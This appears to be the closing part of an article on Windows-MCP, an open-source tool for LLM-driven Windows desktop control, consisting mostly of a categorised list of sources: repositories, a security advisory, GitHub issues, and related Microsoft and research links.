- Anthropic’s name for the broader category of LLM-driven desktop control. Windows-MCP is one implementation of the idea.
All sources & links
Primary
- GitHub: CursorTouch/Windows-MCP — README, tool catalogue, install docs.
- Windows-MCP releases — full version history.
- GHSA-vrxg-gm77-7q5g — the May 2026 CORS / DNS rebinding advisory.
- CursorTouch/Windows-Use — the agent layer built on Windows-MCP.
- Jeomon George — project maintainer.
Community
- Issue #212 — LocalSystem service mode for UAC
- Issue #189 — policy enforcement (PolicyLayer/Intercept)
- Issue #195 — WSL / Claude Code setup
- Issue #194 — remote Windows Server via RDP
- Issue #208 — $env:COMPUTERNAME empty
- Issue #213 — Microsoft Store Claude path resolution
- Hacker News — Windows-MCP submission
Context & comparison
- Microsoft — Securing MCP on Windows
- Microsoft Research — OmniParser V2
- UI-TARS paper (ByteDance)
- Windows Agent Arena benchmark